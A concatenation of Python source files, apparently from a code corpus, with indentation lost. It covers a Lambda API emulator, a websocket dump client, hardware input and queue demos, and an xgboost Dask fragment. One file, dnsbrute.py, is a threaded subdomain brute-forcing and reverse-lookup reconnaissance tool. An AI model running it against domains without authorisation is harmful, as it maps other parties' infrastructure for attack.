LOG.warning('Unable to run Lambda function on API Gateway message: %s %s' % (e, traceback.format_exc()))
def process_sns_notification(func_arn, topic_arn, message, subject=''):
try:
lambda_function = lambda_arn_to_function[func_arn]
event = {
'Records': [{
'Sns': {
'Type': 'Notification',
'TopicArn': topic_arn,
'Subject': subject,
'Message': message,
'Timestamp': timestamp(format=TIMESTAMP_FORMAT_MILLIS)
}
}]
}
run_lambda(lambda_function, event=event, context={}, func_arn=func_arn)
except Exception as e:
LOG.warning('Unable to run Lambda function on SNS message: %s %s' % (e, traceback.format_exc()))
def process_kinesis_records(records, stream_name):
# feed records into listening lambdas
try:
stream_arn = aws_stack.kinesis_stream_arn(stream_name)
sources = get_event_sources(source_arn=stream_arn)
for source in sources:
arn = source['FunctionArn']
lambda_function = lambda_arn_to_function[arn]
event = {
'Records': []
}
for rec in records:
event['Records'].append({
'kinesis': rec
})
run_lambda(lambda_function, event=event, context={}, func_arn=arn)
except Exception as e:
LOG.warning('Unable to run Lambda function on Kinesis records: %s %s' % (e, traceback.format_exc()))
def get_event_sources(func_name=None, source_arn=None):
result = []
for m in event_source_mappings:
if not func_name or m['FunctionArn'] in [func_name, func_arn(func_name)]:
if not source_arn or m['EventSourceArn'].startswith(source_arn):
result.append(m)
return result
def get_host_path_for_path_in_docker(path):
return re.sub(r'^%s/(.*)$' % config.TMP_FOLDER,
r'%s/\1' % config.HOST_TMP_FOLDER, path)
@cloudwatched('lambda')
def run_lambda(func, event, context, func_arn, suppress_output=False):
if suppress_output:
stdout_ = sys.stdout
stderr_ = sys.stderr
stream = StringIO()
sys.stdout = stream
sys.stderr = stream
lambda_cwd = lambda_arn_to_cwd.get(func_arn)
result = None
try:
runtime = lambda_arn_to_runtime.get(func_arn)
handler = lambda_arn_to_handler.get(func_arn)
if use_docker():
handler_args = '"%s"' % handler
entrypoint = ''
# prepare event body
if not event:
LOG.warning('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(event)
# if running a Java Lambda, set up classpath arguments
if runtime == LAMBDA_RUNTIME_JAVA8:
# copy executor jar into temp directory
cp_r(LAMBDA_EXECUTOR_JAR, lambda_cwd)
# TODO cleanup once we have custom Java Docker image
taskdir = '/var/task'
event_file = 'event_file.json'
save_file(os.path.join(lambda_cwd, event_file), event_body)
handler_args = ("bash -c 'cd %s; java -cp .:`ls *.jar | tr \"\\n\" \":\"` \"%s\" \"%s\" \"%s\"'" %
(taskdir, LAMBDA_EXECUTOR_CLASS, handler, event_file))
entrypoint = ' --entrypoint ""'
if config.LAMBDA_REMOTE_DOCKER:
cmd = (
'CONTAINER_ID="$(docker create'
'%s -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' "lambci/lambda:%s" %s'
')";'
'docker cp "%s/." "$CONTAINER_ID:/var/task";'
'docker start -a "$CONTAINER_ID";'
) % (entrypoint, runtime, handler_args, lambda_cwd)
else:
lambda_cwd_on_host = get_host_path_for_path_in_docker(lambda_cwd)
cmd = (
'docker run'
'%s -v "%s":/var/task'
' -e AWS_LAMBDA_EVENT_BODY="$AWS_LAMBDA_EVENT_BODY"'
' -e HOSTNAME="$HOSTNAME"'
' "lambci/lambda:%s" %s'
) % (entrypoint, lambda_cwd_on_host, runtime, handler_args)
print(cmd)
event_body_escaped = event_body.replace("'", "\\'")
# lambci writes the Lambda result to stdout and logs to stderr, fetch it from there!
env_vars = {
'AWS_LAMBDA_EVENT_BODY': event_body_escaped,
'HOSTNAME': DOCKER_BRIDGE_IP
}
result, log_output = run_lambda_executor(cmd, env_vars)
LOG.debug('Lambda log output:\n%s' % log_output)
else:
# execute the Lambda function in a forked sub-process, sync result via queue
queue = Queue()
def do_execute():
# now we're executing in the child process, safe to change CWD
if lambda_cwd:
os.chdir(lambda_cwd)
result = func(event, context)
queue.put(result)
process = Process(target=do_execute)
process.run()
result = queue.get()
except Exception as e:
return error_response("Error executing Lambda function: %s %s" % (e, traceback.format_exc()))
finally:
if suppress_output:
sys.stdout = stdout_
sys.stderr = stderr_
return result
def exec_lambda_code(script, handler_function='handler', lambda_cwd=None):
if lambda_cwd:
cwd_mutex.acquire()
previous_cwd = os.getcwd()
os.chdir(lambda_cwd)
sys.path = [lambda_cwd] + sys.path
# generate lambda file name
lambda_id = 'l_%s' % short_uid()
lambda_file = LAMBDA_SCRIPT_PATTERN.replace('*', lambda_id)
save_file(lambda_file, script)
# delete temporary .py and .pyc files on exit
TMP_FILES.append(lambda_file)
TMP_FILES.append('%sc' % lambda_file)
try:
handler_module = imp.load_source(lambda_id, lambda_file)
module_vars = handler_module.__dict__
except Exception as e:
LOG.error('Unable to exec: %s %s' % (script, traceback.format_exc()))
raise e
finally:
if lambda_cwd:
os.chdir(previous_cwd)
sys.path.pop(0)
cwd_mutex.release()
return module_vars[handler_function]
def get_handler_file_from_name(handler_name, runtime=LAMBDA_RUNTIME_PYTHON27):
# TODO: support Java Lambdas in the future
file_ext = '.js' if runtime.startswith(LAMBDA_RUNTIME_NODEJS) else '.py'
return '%s%s' % (handler_name.split('.')[0], file_ext)
def get_handler_function_from_name(handler_name, runtime=LAMBDA_RUNTIME_PYTHON27):
# TODO: support Java Lambdas in the future
return handler_name.split('.')[-1]
def error_response(msg, code=400, error_type='Exception'):
LOG.warning(msg)
result = {'Type': 'User', 'message': msg}
headers = {'x-amzn-errortype': error_type}
return make_response((jsonify(result), code, headers))
def run_lambda_executor(cmd, env_vars={}):
process = run(cmd, async=True, stderr=subprocess.PIPE, outfile=subprocess.PIPE, env_vars=env_vars)
return_code = process.wait()
result = to_str(process.stdout.read())
log_output = to_str(process.stderr.read())
if return_code != 0:
raise Exception('Lambda process returned error status code: %s. Output:\n%s' %
(return_code, log_output))
return result, log_output
def set_function_code(code, lambda_name):
def generic_handler(event, context):
raise Exception(('Unable to find executor for Lambda function "%s". ' +
'Note that Node.js Lambdas currently require LAMBDA_EXECUTOR=docker') % lambda_name)
lambda_handler = generic_handler
lambda_cwd = None
arn = func_arn(lambda_name)
runtime = lambda_arn_to_runtime[arn]
handler_name = lambda_arn_to_handler.get(arn)
if not handler_name:
handler_name = LAMBDA_DEFAULT_HANDLER
handler_file = get_handler_file_from_name(handler_name, runtime=runtime)
handler_function = get_handler_function_from_name(handler_name, runtime=runtime)
if 'S3Bucket' in code:
s3_client = aws_stack.connect_to_service('s3')
bytes_io = BytesIO()
try:
s3_client.download_fileobj(code['S3Bucket'], code['S3Key'], bytes_io)
zip_file_content = bytes_io.getvalue()
except Exception as e:
return error_response('Unable to fetch Lambda archive from S3: %s' % e, 404)
elif 'ZipFile' in code:
zip_file_content = code['ZipFile']
zip_file_content = base64.b64decode(zip_file_content)
else:
return error_response('No valid Lambda archive specified.')
# save tmp file
tmp_dir = '%s/zipfile.%s' % (config.TMP_FOLDER, short_uid())
run('mkdir -p %s' % tmp_dir)
tmp_file = '%s/%s' % (tmp_dir, LAMBDA_ZIP_FILE_NAME)
save_file(tmp_file, zip_file_content)
TMP_FILES.append(tmp_dir)
lambda_cwd = tmp_dir
# check if this is a ZIP file
is_zip = is_zip_file(zip_file_content)
if is_zip:
run('cd %s && unzip %s' % (tmp_dir, LAMBDA_ZIP_FILE_NAME))
main_file = '%s/%s' % (tmp_dir, handler_file)
if not os.path.isfile(main_file):
# check if this is a zip file that contains a single JAR file
jar_files = glob.glob('%s/*.jar' % tmp_dir)
if len(jar_files) == 1:
main_file = jar_files[0]
if os.path.isfile(main_file):
with open(main_file, 'rb') as file_obj:
zip_file_content = file_obj.read()
else:
file_list = run('ls -la %s' % tmp_dir)
LOG.debug('Lambda archive content:\n%s' % file_list)
return error_response('Unable to find handler script in Lambda archive.')
# it could be a JAR file (regardless of whether wrapped in a ZIP file or not)
is_jar = is_jar_archive(zip_file_content)
if is_jar:
def execute(event, context):
event_file = EVENT_FILE_PATTERN.replace('*', short_uid())
save_file(event_file, json.dumps(event))
TMP_FILES.append(event_file)
class_name = lambda_arn_to_handler[arn].split('::')[0]
classpath = '%s:%s' % (LAMBDA_EXECUTOR_JAR, main_file)
cmd = 'java -cp %s %s %s %s' % (classpath, LAMBDA_EXECUTOR_CLASS, class_name, event_file)
result, log_output = run_lambda_executor(cmd)
LOG.info('Lambda output: %s' % log_output.replace('\n', '\n> '))
return result
lambda_handler = execute
elif runtime.startswith('python') and not use_docker():
try:
lambda_handler = exec_lambda_code(zip_file_content,
handler_function=handler_function, lambda_cwd=lambda_cwd)
except Exception as e:
raise Exception('Unable to get handler function from lambda code.', e)
if not is_zip and not is_jar:
raise Exception('Uploaded Lambda code is neither a ZIP nor JAR file.')
add_function_mapping(lambda_name, lambda_handler, lambda_cwd)
def do_list_functions():
funcs = []
for f_arn, func in iteritems(lambda_arn_to_handler):
func_name = f_arn.split(':function:')[-1]
arn = func_arn(func_name)
funcs.append({
'Version': '$LATEST',
'FunctionName': func_name,
'FunctionArn': f_arn,
'Handler': lambda_arn_to_handler.get(arn),
'Runtime': lambda_arn_to_runtime.get(arn),
'Timeout': LAMBDA_DEFAULT_TIMEOUT,
# 'Description': ''
# 'MemorySize': 192,
# 'CodeSize': 2526917
})
return funcs
@app.route('%s/functions' % PATH_ROOT, methods=['POST'])
def create_function():
""" Create new function
---
operationId: 'createFunction'
parameters:
- name: 'request'
in: body
"""
try:
data = json.loads(to_str(request.data))
lambda_name = data['FunctionName']
event_publisher.fire_event(event_publisher.EVENT_LAMBDA_CREATE_FUNC,
payload={'n': event_publisher.get_hash(lambda_name)})
arn = func_arn(lambda_name)
if arn in lambda_arn_to_handler:
return error_response('Function already exist: %s' %
lambda_name, 409, error_type='ResourceConflictException')
lambda_arn_to_handler[arn] = data['Handler']
lambda_arn_to_runtime[arn] = data['Runtime']
result = set_function_code(data['Code'], lambda_name)
return result or jsonify({})
except Exception as e:
return error_response('Unknown error: %s' % e)
@app.route('%s/functions/<function>' % PATH_ROOT, methods=['GET'])
def get_function(function):
""" Get details for a single function
---
operationId: 'getFunction'
parameters:
- name: 'request'
in: body
- name: 'function'
in: path
"""
funcs = do_list_functions()
for func in funcs:
if func['FunctionName'] == function:
result = {
'Configuration': func,
'Code': {
'Location': '%s/code' % request.url
}
}
return jsonify(result)
result = {
'ResponseMetadata': {
'HTTPStatusCode': 404
}
}
return make_response((jsonify(result), 404, {}))
@app.route('%s/functions/' % PATH_ROOT, methods=['GET'])
def list_functions():
""" List functions
---
operationId: 'listFunctions'
parameters:
- name: 'request'
in: body
"""
funcs = do_list_functions()
result = {}
result['Functions'] = funcs
return jsonify(result)
@app.route('%s/functions/<function>' % PATH_ROOT, methods=['DELETE'])
def delete_function(function):
""" Delete an existing function
---
operationId: 'deleteFunction'
parameters:
- name: 'request'
in: body
"""
arn = func_arn(function)
try:
lambda_arn_to_handler.pop(arn)
except KeyError:
return error_response('Function does not exist: %s' % function, 404, error_type='ResourceNotFoundException')
event_publisher.fire_event(event_publisher.EVENT_LAMBDA_DELETE_FUNC,
payload={'n': event_publisher.get_hash(function)})
lambda_arn_to_cwd.pop(arn, None)
lambda_arn_to_function.pop(arn, None)
i = 0
while i < len(event_source_mappings):
mapping = event_source_mappings[i]
if mapping['FunctionArn'] == arn:
del event_source_mappings[i]
i -= 1
i += 1
result = {}
return jsonify(result)
@app.route('%s/functions/<function>/code' % PATH_ROOT, methods=['PUT'])
def update_function_code(function):
""" Update the code of an existing function
---
operationId: 'updateFunctionCode'
parameters:
- name: 'request'
in: body
"""
data = json.loads(to_str(request.data))
result = set_function_code(data, function)
return result or jsonify({})
@app.route('%s/functions/<function>/code' % PATH_ROOT, methods=['GET'])
def get_function_code(function):
""" Get the code of an existing function
---
operationId: 'getFunctionCode'
parameters:
"""
arn = func_arn(function)
lambda_cwd = lambda_arn_to_cwd[arn]
tmp_file = '%s/%s' % (lambda_cwd, LAMBDA_ZIP_FILE_NAME)
return Response(load_file(tmp_file, mode="rb"),
mimetype='application/zip',
headers={'Content-Disposition': 'attachment; filename=lambda_archive.zip'})
@app.route('%s/functions/<function>/configuration' % PATH_ROOT, methods=['PUT'])
def update_function_configuration(function):
""" Update the configuration of an existing function
---
operationId: 'updateFunctionConfiguration'
parameters:
- name: 'request'
in: body
"""
data = json.loads(to_str(request.data))
arn = func_arn(function)
if data.get('Handler'):
lambda_arn_to_handler[arn] = data['Handler']
if data.get('Runtime'):
lambda_arn_to_runtime[arn] = data['Runtime']
result = {}
return jsonify(result)
@app.route('%s/functions/<function>/invocations' % PATH_ROOT, methods=['POST'])
def invoke_function(function):
""" Invoke an existing function
---
operationId: 'invokeFunction'
parameters:
- name: 'request'
in: body
"""
arn = func_arn(function)
lambda_function = lambda_arn_to_function.get(arn)
if not lambda_function:
return error_response('Function does not exist: %s' % function, 404, error_type='ResourceNotFoundException')
data = None
if request.data:
try:
data = json.loads(to_str(request.data))
except Exception as e:
return error_response('The payload is not JSON', 415, error_type='UnsupportedMediaTypeException')
result = run_lambda(lambda_function, func_arn=arn, event=data, context={})
if isinstance(result, dict):
return jsonify(result)
if result:
return result
return make_response('', 200)
@app.route('%s/event-source-mappings/' % PATH_ROOT, methods=['GET'])
def list_event_source_mappings():
""" List event source mappings
---
operationId: 'listEventSourceMappings'
"""
event_source_arn = request.args.get('EventSourceArn')
function_name = request.args.get('FunctionName')
mappings = event_source_mappings
if event_source_arn:
mappings = [m for m in mappings if event_source_arn == m.get('EventSourceArn')]
if function_name:
function_arn = func_arn(function_name)
mappings = [m for m in mappings if function_arn == m.get('FunctionArn')]
response = {
'EventSourceMappings': mappings
}
return jsonify(response)
@app.route('%s/event-source-mappings/' % PATH_ROOT, methods=['POST'])
def create_event_source_mapping():
""" Create new event source mapping
---
operationId: 'createEventSourceMapping'
parameters:
- name: 'request'
in: body
"""
data = json.loads(to_str(request.data))
mapping = add_event_source(data['FunctionName'], data['EventSourceArn'])
return jsonify(mapping)
@app.route('%s/event-source-mappings/<mapping_uuid>' % PATH_ROOT, methods=['PUT'])
def update_event_source_mapping(mapping_uuid):
""" Update an existing event source mapping
---
operationId: 'updateEventSourceMapping'
parameters:
- name: 'request'
in: body
"""
data = json.loads(request.data)
if not mapping_uuid:
return jsonify({})
function_name = data.get('FunctionName') or ''
enabled = data.get('Enabled') or True
batch_size = data.get('BatchSize') or 100
mapping = update_event_source(mapping_uuid, function_name, enabled, batch_size)
return jsonify(mapping)
@app.route('%s/event-source-mappings/<mapping_uuid>' % PATH_ROOT, methods=['DELETE'])
def delete_event_source_mapping(mapping_uuid):
""" Delete an event source mapping
---
operationId: 'deleteEventSourceMapping'
"""
if not mapping_uuid:
return jsonify({})
mapping = delete_event_source(mapping_uuid)
return jsonify(mapping)
def serve(port, quiet=True):
generic_proxy.serve_flask_app(app=app, port=port, quiet=quiet)
|
dnsbrute.py | #!/usr/bin/env python3
import sys
import dns.resolver
import dns.reversename
import dns.exception
import netaddr
import ipwhois
import threading
import queue
import time
THREAD_COUNT = 256 # Minimum number of threads.
BLOCK_SIZE = 1024 # Smallest netblock on which we will do reverse lookups.
LIFETIME = 10.0 # Total time in seconds we will wait for a DNS response.
# Configure the resolver to use throughout the script.
resolver = dns.resolver.Resolver()
resolver.lifetime = LIFETIME
def parallel(func, items):
"""
Run the given function in parallel.
Use multithreading to run the given function and arguments in parallel.
"""
# Setup the work and results queues and the finish event.
item_queue = queue.Queue()
fin = threading.Event()
# Load the ports into the queue
for i in items:
item_queue.put(i)
# Setup and launch threads.
for i in range(THREAD_COUNT):
t1 = threading.Thread(target=func, args=(fin, item_queue))
t1.start()
# Wait for threads to complete. Handle Ctrl-C if necessary.
try:
old_len = item_queue.qsize()
while threading.active_count() > 1:
time.sleep(2)
new_len = item_queue.qsize()
if (old_len - new_len) >= 1000:
print('[+] {0} items remaining.'.format(new_len))
old_len = new_len
except KeyboardInterrupt:
fin.set()
def resolve(fqdn, rtype='A'):
"""
Resolve a DNS query.
Query the DNS server for a record of type rtype. The default is A records.
"""
# Resolve our query and return a list of answers. If there are any
# exceptions, print the exception and return an empty list.
try:
ans = resolver.query(fqdn, rtype)
return [a.to_text() for a in ans]
except dns.exception.DNSException:
return []
def get_words(filename):
"""
Get the wordlist from the file.
"""
wordlist = []
with open(filename) as f:
for line in f:
line = line.rstrip()
if (line != '') and (line[0] != '#'):
wordlist.append(line)
return wordlist
def brute(fin, word_queue):
"""
Brute force DNS records for a name.
Look for A, AAAA, and CNAME records associated with the given word.
"""
while not fin.isSet():
# Get a new word to test, if there are no more words exit the thread.
try:
word = word_queue.get(timeout=1)
except queue.Empty:
return
# Get A and AAAA records
fqdn = '{0}.{1}'.format(word, records['domain'])
ips = resolve(fqdn)
ips.extend(resolve(fqdn, rtype='AAAA'))
for ip in ips:
records['forward'].append((fqdn, netaddr.IPAddress(ip)))
# Look for CNAME records
names = resolve(fqdn, rtype='CNAME')
for name in names:
# Skip FQDN CNAMEs
if name.endswith('.'):
continue
ips = resolve(name)
for ip in ips:
records['forward'].append((name, netaddr.IPAddress(ip)))
def rev_lookup(fin, address_queue):
"""
Reverse lookup
Perform a reverse lookup of an IP address and update the reverse dict.
"""
while not fin.isSet():
# Get a new address to test, if there are no more addresses exit the
# thread.
try:
addr = address_queue.get(timeout=1)
except queue.Empty:
return # No more addresses, exit thread.
# Convert the IP to a PTR name.
revip = dns.reversename.from_address(str(addr))
# Resolve the PTR name.
names = resolve(revip, 'PTR')
for name in names:
records['reverse'].append((addr, name))
def reverse(addresses, netblocks):
"""
Reverse lookups
Perform a reverse lookup on all of the IP addresses identified so far.
In addition perform reverse lookups on small Netblocks.
"""
addresses = [a[1] for a in addresses]
for block in netblocks:
if block[0].size <= BLOCK_SIZE:
addresses.extend(block[0])
parallel(rev_lookup, set(addresses))
def netblock(addresses):
"""
Find the netblocks that our IP addresses belong to.
Before doing a whois lookup for the netblock see if the IP address is
already in our current netblocks.
"""
for ip in set([a[1] for a in addresses]):
# If the IP is in one of our netblocks then move on.
found = False
for block in records['netblocks']:
if ip in block[0]:
found = True
break
if found is True:
continue
# If the ip is not in one of our netblocks then look up the netblock
# associated with the IP.
network = None
try:
resp = ipwhois.IPWhois(ip).lookup_rdap()
network = resp['network']
except:
continue
if network is None:
continue
# Process the whois response
name = network['name']
if name is None:
name = 'Unknown'
# If cidr is present then process it. If it is not present then
# build the cidr from the range created by the start and end
# addreses.
if 'cidr' in network:
cidr = network['cidr'].split(', ')
records['netblocks'].extend([(netaddr.IPNetwork(c), name) for c in cidr])
else:
range = netaddr.IPRange(network['start_address'], network['end_address'])
records['netblocks'].append((range.cidrs()[0], name))
def usage():
print('Usage: resolve_mt.py domain.name wordlist')
sys.exit(1)
if __name__ == '__main__':
if len(sys.argv) != 3:
usage()
wordlist = get_words(sys.argv[2])
records = {'domain': sys.argv[1], 'soa': '', 'nservers': [],
'mailex': [], 'axfr': [], 'forward': [], 'reverse': [],
'netblocks': []}
print(records['domain'].upper())
print('=' * len(records['domain']))
print('[*] Get SOA record.')
ans = resolve(records['domain'], rtype='SOA')
if ans != []:
ans = ans[0].split()
records['soa'] = ans[0].rstrip('.')
print('[*] Getting name servers.')
records['nservers'] = [n.rstrip('.') for n in resolve(records['domain'], rtype='NS')]
# Use all name servers to resolve queries
nservers = []
for ns in records['nservers']:
nservers.extend(resolve(ns))
resolver.nameservers = nservers
print('[*] Brute forcing domain names.')
parallel(brute, wordlist)
print('[*] Getting Net blocks for IP addresses.')
netblock(records['forward'])
print('[*] Doing reverse lookups on IP addresses.')
reverse(records['forward'], records['netblocks'])
report = []
report.append(records['domain'].upper())
report.append('=' * len(records['domain']))
report.append('Start of Authority')
report.append('------------------')
report.append(records['soa'])
report.append('')
report.append('Name Servers')
report.append('------------')
report.extend(records['nservers'])
report.append('')
report.append('Forward Lookups')
report.append('---------------')
report.extend(['{0} - {1}'.format(r[0], r[1]) for r in sorted(set(records['forward']))])
report.append('')
report.append('Reverse Lookups')
report.append('---------------')
report.extend(['{0} - {1}'.format(r[0], r[1]) for r in sorted(set(records['reverse']))])
report.append('')
f = open('{0}.txt'.format(records['domain']), 'w')
f.write('\n'.join(report))
f.close()
|
wsdump.py | #!/Users/weiyihu/StudioProjects/team-project-14-djno/backend/virt/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
DigitalInputReader.py | from typing import Callable, Dict, List, Optional
from vosekast_control.connectors import SMBusConnection
import threading
import logging
from vosekast_control.Log import LOGGER
from inspect import iscoroutinefunction
from asyncio import create_task, BaseEventLoop
from time import sleep
from vosekast_control.connectors.AppControl import AppControl
logger = logging.getLogger(LOGGER)
class Callback:
callback: Callable[[bool], None]
input_pin: int
def __init__(self, callback, input_pin) -> None:
self.callback = callback
self.input_pin = input_pin
class DigitalInputReaderConnector:
callbacks: Dict[int, Callback]
address: int
counter: int
event_loop: Optional[BaseEventLoop]
def __init__(self, address=0x39):
self.address = address
self.counter = 0
self.callbacks = {}
self.old_state = None
self._thread = threading.Thread(target=self._loop)
self.event_loop = None
def start(self):
logger.info("Start background thread for DigitalInputs.")
self._thread.start()
def _loop(self):
while not AppControl.is_terminating():
try:
new_state = self._read_state()
if self.old_state is not None and new_state != self.old_state:
self._trigger_callbacks(new_state)
self.old_state = new_state
sleep(0.1)
except Exception as err:
logger.warning(f'Error in digital input loop: {err}')
logger.info("Stopped background thread for DigitalInputs.")
def _trigger_callbacks(self, new_state):
for i in range(1, 8):
pin_state = self._get_pin_state(i, new_state)
if pin_state != self._get_pin_state(i, self.old_state):
callback = self.callbacks.get(i)
if callback is not None:
if (iscoroutinefunction(callback.callback)):
if self.event_loop is None:
logger.warning('DigitalInputReader tries to run a async task, but has no event loop reference.')
self.event_loop.create_task(callback.callback(pin_state))
else:
callback.callback(pin_state)
def _get_pin_state(self, pin, bin_state):
pin_state = 1 ^ (1 & (bin_state >> (pin - 1)))
return pin_state == 1
def _read_state(self) -> int:
state_reading = SMBusConnection.smbus.read_byte(self.address)
return state_reading
def digital_read(self, pin: int) -> bool:
if pin >= 9 or pin <= 0:
raise Exception("Pin is out of Range. Valid Pins are 1-8")
bin_state = self._read_state()
pin_state = 1 ^ (1 & (bin_state >> (pin - 1)))
return pin_state == 1
def add_callback(self, input_pin: int, callback: Callable[[bool], None]):
callback_obj = Callback(callback, input_pin)
self.callbacks[input_pin] = callback_obj
def clear_callback(self, input_pin: int):
del self.callbacks[input_pin]
def clear_callbacks(self):
self.callbacks = {}
DigitalInputReader = DigitalInputReaderConnector()
|
py_queue.py | #!usr/bin/env python
# coding=utf-8
import time
import multiprocessing
def write(queue):
vals = [1, 2, 3, 4, 5, 6]
for v in vals:
print 'Put %s to queue...' % v
queue.put(v)
time.sleep(3)
def read(queue):
while 1:
value = queue.get(True)
print 'Get %s from queue.' % value
pool = multiprocessing.Pool()
queue = multiprocessing.Queue()
pw = multiprocessing.Process(target=write, args=(queue,))
pr = multiprocessing.Process(target=read, args=(queue,))
pw.start()
pr.start()
pw.join()
pr.terminate()
|
dask.py | # pylint: disable=too-many-arguments, too-many-locals
"""Dask extensions for distributed training. See
https://xgboost.readthedocs.io/en/latest/tutorials/dask.html for simple
tutorial. Also xgboost/demo/dask for some examples.
There are two sets of APIs in this module, one is the functional API including
``train`` and ``predict`` methods. Another is stateful Scikit-Learner wrapper
inherited from single-node Scikit-Learn interface.
The implementation is heavily influenced by dask_xgboost:
https://github.com/dask/dask-xgboost
"""
import platform
import logging
from collections import defaultdict
from threading import Thread
import numpy
from . import rabit
from .compat import DASK_INSTALLED
from .compat import distributed_get_worker, distributed_wait, distributed_comm
from .compat import da, dd, delayed, get_client
from .compat import sparse, scipy_sparse
from .compat import PANDAS_INSTALLED, DataFrame, Series, pandas_concat
from .compat import CUDF_INSTALLED, CUDF_DataFrame, CUDF_Series, CUDF_concat
from .core import DMatrix, Booster, _expect
from .training import train as worker_train
from .tracker import RabitTracker
from .sklearn import XGBModel, XGBClassifierBase, xgboost_model_doc
# Current status is considered as initial support, many features are
# not properly supported yet.
#
# TODOs:
# - Callback.
# - Label encoding.
# - CV
# - Ranking
def _start_tracker(host, n_workers):
"""Start Rabit tracker """
env = {'DMLC_NUM_WORKER': n_workers}
rabit_context = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit_context.slave_envs())
rabit_context.start(n_workers)
thread = Thread(target=rabit_context.join)
thread.daemon = True
thread.start()
return env
def _assert_dask_support():
if not DASK_INSTALLED:
raise ImportError(
'Dask needs to be installed in order to use this module')
if platform.system() == 'Windows':
msg = 'Windows is not officially supported for dask/xgboost,'
msg += ' contribution are welcomed.'
logging.warning(msg)
class RabitContext:
'''A context controling rabit initialization and finalization.'''
def __init__(self, args):
self.args = args
def __enter__(self):
rabit.init(self.args)
logging.debug('-------------- rabit say hello ------------------')
def __exit__(self, *args):
rabit.finalize()
logging.debug('--------------- rabit say bye ------------------')
def concat(value):
'''To be replaced with dask builtin.'''
if isinstance(value[0], numpy.ndarray):
return numpy.concatenate(value, axis=0)
if scipy_sparse and isinstance(value[0], scipy_sparse.spmatrix):
return scipy_sparse.vstack(value, format='csr')
if sparse and isinstance(value[0], sparse.SparseArray):
return sparse.concatenate(value, axis=0)
if PANDAS_INSTALLED and isinstance(value[0], (DataFrame, Series)):
return pandas_concat(value, axis=0)
if CUDF_INSTALLED and isinstance(value[0], (CUDF_DataFrame, CUDF_Series)):
return CUDF_concat(value, axis=0)
return dd.multi.concat(list(value), axis=0)
def _xgb_get_client(client):
